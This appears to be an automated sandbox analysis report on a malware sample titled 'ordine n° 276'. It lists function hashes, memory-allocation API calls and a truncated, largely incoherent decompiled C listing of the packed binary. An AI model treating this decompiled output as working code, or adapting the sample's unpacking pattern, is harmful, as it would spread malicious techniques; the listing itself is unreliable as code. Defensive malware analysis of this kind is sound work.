Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc58fffb16a4b88898b376a53053bf93dbd3e592f3998a9203a9eb83cdaf1ec
Instruction ID: d9ea5dec187e375e832bf230f633702c753fd33cb281de4db3c8c2838a03fa7d
Opcode Fuzzy Hash: 6fc58fffb16a4b88898b376a53053bf93dbd3e592f3998a9203a9eb83cdaf1ec
Instruction Fuzzy Hash: 63324C62F1A7000B875E94BE98D0966D0C39FEE251229E63D252EF73A9FD79CC4B114C

Uniqueness

Uniqueness Score: -1.00%

Function 0040377D, Relevance: 2.3, APIs: 1, Instructions: 1096
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ba2d8af27b522e369922de7630f2143d687852f6d0cf410c2898cdd05ffbc9
Instruction ID: 1618109241188de27ecc66ee0b1c0c968d37e52153f28cd3e00acd4b5a3d80a1
Opcode Fuzzy Hash: a2ba2d8af27b522e369922de7630f2143d687852f6d0cf410c2898cdd05ffbc9
Instruction Fuzzy Hash: 21424C62B1A7000B875E94BE98D0966D0C39FEE251229E63D252EF73A9FD79CD0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00403CB3, Relevance: 2.2, APIs: 1, Instructions: 963
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4b192ac25ce7840c8009f00ce6af8122f33197cff2d754367970ebc823fddb
Instruction ID: ca2cfb47e39dc40fb754d2fdf71e1478f5b8d45c84d622d07597d31ab9b6bf20
Opcode Fuzzy Hash: 7a4b192ac25ce7840c8009f00ce6af8122f33197cff2d754367970ebc823fddb
Instruction Fuzzy Hash: 9B223B62F197000B875E94BE98D0966D0C39FEE250269E63D252EF73A9FD79CC4B124C

Uniqueness

Uniqueness Score: -1.00%

Function 00403D9F, Relevance: 2.2, APIs: 1, Instructions: 921
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286f4b30340904fb1e4caea19aacad11ceab8e611f7d3af71713289ce5e2c6ed
Instruction ID: 0bd49bbd1d32d64dc31dc5bbc2a1f3ccad7de1366681ff1e82069e52d0379500
Opcode Fuzzy Hash: 286f4b30340904fb1e4caea19aacad11ceab8e611f7d3af71713289ce5e2c6ed
Instruction Fuzzy Hash: 33123C62F1A7000B875E94BE98D0966D0C39FEE250269E63D252DF73A9FD79CC4B124C

Uniqueness

Uniqueness Score: -1.00%

Function 0040408E, Relevance: 2.1, APIs: 1, Instructions: 898
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ac722583074ecdf66cfa0e85586aa877121cb15afc4331a42009ecf5061d8c
Instruction ID: ebda6499dc2f431bb01e7fcdc5c570d5d3a09506cbf7b3da258617ff0e81529c
Opcode Fuzzy Hash: 05ac722583074ecdf66cfa0e85586aa877121cb15afc4331a42009ecf5061d8c
Instruction Fuzzy Hash: BF024B62F1A7000B875E94BE98D0966D0C39FDE25027AE63D252EF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404263, Relevance: 2.1, APIs: 1, Instructions: 836
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da363e89265edefdd7cdbd5324b3883b6580feed7e1ffcdf20f1b6a4a74dd188
Instruction ID: d2507081f52bc35728634f3212d625c0b7a86b949321cdf01a542da6be3940de
Opcode Fuzzy Hash: da363e89265edefdd7cdbd5324b3883b6580feed7e1ffcdf20f1b6a4a74dd188
Instruction Fuzzy Hash: D4F14A62F1A7000B875E94BE99D0966D0C39FDE25023AE63D252EF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00403E98, Relevance: 2.1, APIs: 1, Instructions: 823
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 790dc0914ddc25a14e4e7ffa3d30a50dca94df27a8856d5b99456c1101306875
Instruction ID: 5d4c1e28a8188725253d3856b6034213b00e43e07b045eea5ee70f1915ec0278
Opcode Fuzzy Hash: 790dc0914ddc25a14e4e7ffa3d30a50dca94df27a8856d5b99456c1101306875
Instruction Fuzzy Hash: 91123B62F197000B875E94BE98D0966D0C39FEE250269E63D252EF73A9FD79CC4B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00403F94, Relevance: 2.1, APIs: 1, Instructions: 803
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1fc1c931cf5613fe09c84294f999292d695084eaf9ac635f6a3ab2e5d3d65d
Instruction ID: 49b366ad0a1a660a03c83b16ff0bbba12662ae49f65d738d6ea7deed41805a6f
Opcode Fuzzy Hash: af1fc1c931cf5613fe09c84294f999292d695084eaf9ac635f6a3ab2e5d3d65d
Instruction Fuzzy Hash: A8024B62F197000B875E94BE98D0966D0C39FDE25022AE63D252EF73A9FD79CC4B164C

Uniqueness

Uniqueness Score: -1.00%

Function 00404551, Relevance: 2.0, APIs: 1, Instructions: 730
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de9dc2144c4bcd582eaa49f4af43844db774cc5fc407494de4ce23c84af09e3a
Instruction ID: 2b0294c6708d095b8af1082f930671e56b3da667615389cf93ce7fab0464e942
Opcode Fuzzy Hash: de9dc2144c4bcd582eaa49f4af43844db774cc5fc407494de4ce23c84af09e3a
Instruction Fuzzy Hash: CBD15A62B1A7000B875E94BE99D0967D0C39FDE250239E63D252EF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404463, Relevance: 1.9, APIs: 1, Instructions: 674
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cd1e7a784cf82f3e920186ecbba93a4be7f4c4e7d41210711da29916f3ac80b5
Instruction ID: c92f8ed660f9f1aec830b18ae6a57325ed2918e9a5303ea46440dd3a0624abd9
Opcode Fuzzy Hash: cd1e7a784cf82f3e920186ecbba93a4be7f4c4e7d41210711da29916f3ac80b5
Instruction Fuzzy Hash: 2CD14A62B1A7000B875E94BE98D096690C39FDE25063AE63D262DF73A9FD79CC4B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404365, Relevance: 1.9, APIs: 1, Instructions: 664memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f500372e64cbb2ddf163046cc3bd3a4d5915e0e6670fbfdb6c608db07e924dfa
Instruction ID: 9b14469905326bd112a7f3c8cbe46c653d467087fcc1174f1fb4b2fe9ce3da42
Opcode Fuzzy Hash: f500372e64cbb2ddf163046cc3bd3a4d5915e0e6670fbfdb6c608db07e924dfa
Instruction Fuzzy Hash: BAE14A62F1A7000B875E94BE99D0966D0C39FDE25023AE63D252DF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404647, Relevance: 1.8, APIs: 1, Instructions: 561memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 30ba40459a95d60a96de621c857686014abec64c8c39fd0126205540a9a3774d
Instruction ID: c20cc636acbdb067f57b1b0b6ceffe6d8e19b5f25af8446ada72118c30ba1cd8
Opcode Fuzzy Hash: 30ba40459a95d60a96de621c857686014abec64c8c39fd0126205540a9a3774d
Instruction Fuzzy Hash: 5BC15A62B1AB000B875E94BE94D09A7D0C39FDE250239E63D212EF73A9FD79CC4A014C

Uniqueness

Uniqueness Score: -1.00%

Function 00404A2C, Relevance: 1.8, APIs: 1, Instructions: 545memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 86d4e1bfb3b86659fd56721e55b0ebc17ef24b13f1fe164268571919a72fba1b
Instruction ID: e20323254dca737f2b349b1bc363f18904a9e3bd9c077d59616b131cfb4d4591
Opcode Fuzzy Hash: 86d4e1bfb3b86659fd56721e55b0ebc17ef24b13f1fe164268571919a72fba1b
Instruction Fuzzy Hash: E3912862B1AB000B875D94BE89D0AA7D1D39FDE250639E63D211EF33A9FD79CC4A0548

Uniqueness

Uniqueness Score: -1.00%

Function 0040483D, Relevance: 1.8, APIs: 1, Instructions: 532memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66b3c7e979294559f52489c7930be7e626bcacc9b19b6c2daf510255b58babcc
Instruction ID: e1d6d36e0e3b2ab8c1e3a7d0309b96a03efdac17094e49c87ca916b68f4af836
Opcode Fuzzy Hash: 66b3c7e979294559f52489c7930be7e626bcacc9b19b6c2daf510255b58babcc
Instruction Fuzzy Hash: 65B16B22B1AB000B875E94BE84D09A7D1D39FDE250739E63D652EF73A9FD79CC4A0148

Uniqueness

Uniqueness Score: -1.00%

Function 0040493B, Relevance: 1.8, APIs: 1, Instructions: 506memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 84f14d8ae52e25f9df078d43e04ecd6776e9c10690180559a1ff6d5f84f839a4
Instruction ID: 27090ff0fbb432ceb1f90c5f69d6c249167c7575579ce6803d43393b5e923ee6
Opcode Fuzzy Hash: 84f14d8ae52e25f9df078d43e04ecd6776e9c10690180559a1ff6d5f84f839a4
Instruction Fuzzy Hash: 24A14A22B1AB000B875D94BE99D0A67D1D39FDE250639E63D251EF33A9FD79CC4A014C

Uniqueness

Uniqueness Score: -1.00%

Function 02172819, Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 02172842

Memory Dump Source

Source File: 00000000.00000002.749413362.0000000002170000.00000040.00000001.sdmp, Offset: 02170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2170000_ordine n#U00b0 276.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d7721bc7e0463699e1b1adb47fc6c6ed7e26036a6ae3449fe9f4455c2b604d21
Instruction ID: d0f178e209e383b2a65e5b25fa701b0b03f17a1f016a254255a872e3f052421a
Opcode Fuzzy Hash: d7721bc7e0463699e1b1adb47fc6c6ed7e26036a6ae3449fe9f4455c2b604d21
Instruction Fuzzy Hash: 8621041614D6D18ED7134B7899B17C5BFB4AD8B22079C03D9C5D01BA5BD62502ABC391

Uniqueness

Uniqueness Score: -1.00%

Function 0040F666, Relevance: 396.5, APIs: 208, Strings: 17, Instructions: 2722
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040F666(char _a1, signed char _a8, intOrPtr _a27, char _a109, intOrPtr _a110, void* _a762) {
				intOrPtr _v4;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				void* _v36;
				void* _v48;
				void* _v320;
				void* _v328;
				void* _v340;
				void* _v344;
				void* _v352;
				void* _v356;
				void* _v380;
				void* _v384;
				void* _v388;
				void* _v392;
				void* _v428;
				void* _v432;
				void* _v440;
				void* _v444;
				void* _v448;
				void* _v468;
				void* _v472;
				void* _v476;
				void* _v488;
				void* _v496;
				void* _v500;
				void* _v504;
				void* _v512;
				void* _v516;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v536;
				void* _v544;
				void* _v552;
				void* _v560;
				void* _v568;
				void* _v576;
				void* _v584;
				void* _v592;
				void* _v600;
				void* _v608;
				void* _v616;
				void* _v624;
				void* _v632;
				void* _v640;
				void* _v660;
				void* _v664;
				void* _v668;
				void* _v672;
				void* _v676;
				void* _v680;
				void* _v684;
				void* _v688;
				void* _v692;
				void* _v696;
				void* _v708;
				void* _v712;
				void* _v716;
				void* _v720;
				void* _v724;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v756;
				void* _v760;
				void* _v764;
				void* _v900;
				void* _v904;
				void* _v908;
				void* _v932;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* _v968;
				void* _v972;
				void* _v976;
				void* _v980;
				void* _v984;
				void* _v988;
				void* _v992;
				void* _v996;
				void* _v1000;
				void* _v1004;
				void* _v1008;
				void* _v1012;
				void* _v1016;
				void* _v1020;
				void* _v1024;
				void* _v1028;
				void* _v1032;
				void* _v1036;
				void* _v1040;
				void* _v1044;
				void* _v1048;
				void* _v1052;
				void* _v1056;
				void* _v1060;
				void* _v1064;
				void* _v1068;
				void* _v1072;
				void* _v1076;
				void* _v1080;
				void* _v1084;
				void* _v1088;
				void* _v1092;
				void* _v1096;
				void* _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1116;
				void* _v1120;
				void* _v1124;
				void* _v1128;
				void* _v1132;
				void* _v1136;
				void* _v1140;
				void* _v1144;
				void* _v1148;
				void* _v1152;
				void* _v1156;
				void* _v1160;
				void* _v1164;
				void* _v1168;
				void* _v1172;
				void* _v1176;
				void* _v1180;
				void* _v1184;
				void* _v1188;
				void* _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				void* _v1212;
				void* _v1216;
				void* _v1220;
				void* _v1224;
				void* _v1228;
				void* _v1232;
				void* _v1236;
				void* _v1240;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1260;
				void* _v1264;
				void* _v1268;
				void* _v1272;
				void* _v1276;
				void* _v1280;
				void* _v1284;
				void* _v1288;
				void* _v1292;
				void* _v1296;
				void* _v1300;
				void* _v1304;
				void* _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				void* _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				void* _v1340;
				void* _v1344;
				void* _v1348;
				void* _t1349;
				void* _t1350;
				void* _t1351;
				void* _t1355;
				void* _t1356;
				signed int _t1363;
				void* _t1926;
				signed int _t1930;
				void* _t1931;
				signed char _t1932;
				signed int _t2081;
				void* _t2085;
				signed int _t2090;
				signed int _t2091;
				signed int _t2098;
				signed int _t2106;
				signed int _t2127;
				intOrPtr _t2138;
				void* _t2139;
				intOrPtr _t2143;
				signed char _t2145;
				intOrPtr _t2150;
				void* _t2151;
				signed int _t2154;
				signed int _t2155;
				void* _t2160;

				_t1350 = _t1349 + 1;
				 *((intOrPtr*)(_t1350 - 0x2e)) =  *((intOrPtr*)(_t1350 - 0x2e)) + _t2081;
				_t1351 = _t1350 + 1;
				 *((intOrPtr*)(_t1351 + 0x63)) =  *((intOrPtr*)(_t1351 + 0x63)) + _t1931;
				while(1) {
					asm("arpl [ecx], ax");
					asm("lock rol byte [eax], cl");
					asm("sbb bl, dl");
					 *((intOrPtr*)(_t1930 + 0x41)) =  *((intOrPtr*)(_t1930 + 0x41)) + _t1931;
					asm("rol byte [eax], cl");
					_t1355 = (_t1351 + 0x00000001 + _t2081 ^ 0x000000d3) + 1;
					 *((intOrPtr*)(_t1355 + 0x63)) =  *((intOrPtr*)(_t1355 + 0x63)) + _t2081;
					_t1932 = _t1931 + 1;
					_t1356 = _t1355 + _t2081;
					asm("rol byte [eax], cl");
					_push(_t1356);
					asm("rol dword [eax], cl");
					if(_t1356 == 0) {
						break;
					}
					_t1931 = _t1932 + 1;
					_t1351 = _t1356 + _t2081;
					asm("rol byte [eax], cl");
					if(_t1351 < 0) {
						continue;
					}
					 *((intOrPtr*)(_t1351 + 0x64)) =  *((intOrPtr*)(_t1351 + 0x64)) + _t1930;
					_t1932 = _t1931 + 1;
					asm("rol byte [eax], cl");
					_t1930 = _t2081;
					 *((intOrPtr*)(_t1930 + 0x41)) =  *((intOrPtr*)(_t1930 + 0x41)) + _t1930;
					asm("rol byte [eax], cl");
					asm("arpl [ecx], ax");
					asm("lock rol byte [eax], cl");
					asm("enter 0x40d3, 0x0");
					asm("rol byte [eax], cl");
					asm("loopne 0xffffffd5");
					_t1926 =  *0x800040d3 + _t2081 + 1;
					 *((intOrPtr*)(_t1926 - 0xfffbe9d)) =  *((intOrPtr*)(_t1926 - 0xfffbe9d)) + _t1932;
					asm("rol byte [eax], cl");
					 *((intOrPtr*)(_t1930 - 0x2d0fffbf)) =  *((intOrPtr*)(_t1930 - 0x2d0fffbf)) + _t1932;
					 *((intOrPtr*)(_t2106 + _t2081 * 8)) =  *((intOrPtr*)(_t2106 + _t2081 * 8)) + _t2081;
					_t1356 = _t1926 + 0xd7;
					 *((intOrPtr*)(_t1356 - 0xfffbe9d)) =  *((intOrPtr*)(_t1356 - 0xfffbe9d)) + _t2081;
					asm("rol byte [eax], cl");
					asm("aam 0x40");
					 *((intOrPtr*)(_t1930 - 0x2d0fffbf)) =  *((intOrPtr*)(_t1930 - 0x2d0fffbf)) + _t2081;
					break;
				}
				asm("rol byte [eax], cl");
				asm("loopne 0xffffffd4");
				 *((intOrPtr*)(_t1356 + 1 - 0xfffbe9d)) =  *((intOrPtr*)(_t1356 + 1 - 0xfffbe9d)) + _t1930;
				asm("rol byte [eax], cl");
				asm("arpl [ecx], ax");
				asm("lock rol byte [eax], cl");
				0xa04137e9();
				asm("arpl [ecx], ax");
				asm("lock rol byte [eax], cl");
				_t1360 = 0xffffffff9c0040d6;
				_t30 = _t1930 + 0x6d6f0041;
				 *_t30 =  *((intOrPtr*)(_t1930 + 0x6d6f0041)) + 0xffffffff9c0040d6;
				if( *_t30 <= 0) {
					L10:
					_t2085 = _t2085 - 1;
					_push(_t2081);
					_push(_t2106);
					_t1932 = _t1932 - 1;
					_t2106 = _t2106 - 1;
					 *_t1360 =  *_t1360 + _t1360;
					asm("a16 popad");
					L11:
					asm("a16 popad");
					if (_t2138 >= 0) goto L12;
					 *_t1360 =  *_t1360 + _t1360;
					_t2139 =  *_t1360;
					_push(_t1930);
					if(_t2139 < 0) {
						L27:
						 *_t1360 =  *_t1360 + _t1360;
						goto L28;
					} else {
						asm("outsd");
						asm("a16 outsb");
						asm("outsd");
						if(_t2139 < 0) {
							L28:
							 *_t1360 =  *_t1360 + _t1360;
							_t2098 =  &_a1;
							_t2091 =  *[gs:edi+ebp*2+0x6d] * 0x72;
							asm("popad");
							asm("popad");
							if(_t2091 == 0) {
								L38:
								asm("a16 jb 0x72");
								L39:
								if(_t2154 < 0) {
									L60:
									_push(_t2091);
									_push(_t2085);
									L61:
									_v24 = _t2106;
									_v20 = 0x401110;
									_v16 = _a8 & 0x00000001;
									_t1363 = _a8;
									_t1360 = _t1363 & 0xfffffffe;
									 *((char*)(_t1932 + 0x45c70845)) =  *((char*)(_t1932 + 0x45c70845)) - 1;
									asm("hlt");
									 *_t1360 =  *_t1360 + _t1360;
									 *_t1360 =  *_t1360 + _t1360;
									_t1360 = _a8;
									 *(_t1930 + 0x875ff00) =  *(_t1930 + 0x875ff00) | _t1932;
									_t1930 = _t1930 + _t1930;
									if(_t1930 != 0) {
										L69:
										 *_t1360 =  *_t1360 + _t1360;
										_v4 = 2;
										L70:
										 *((intOrPtr*)(_t1930 + 0x4163643d)) =  *((intOrPtr*)(_t1930 + 0x4163643d)) + _t1360;
										_a27 = _a27 + _t2081;
									}
									_t1360 =  *((intOrPtr*)(_t1360 + 4))();
									_t1360 = _t1360 + 0xc7;
									asm("cld");
									 *_t1360 =  *_t1360 + _t1360;
									goto L69;
								}
								 *[gs:ebx+0x6b] =  *[gs:ebx+0x6b] + _t2081;
								asm("popad");
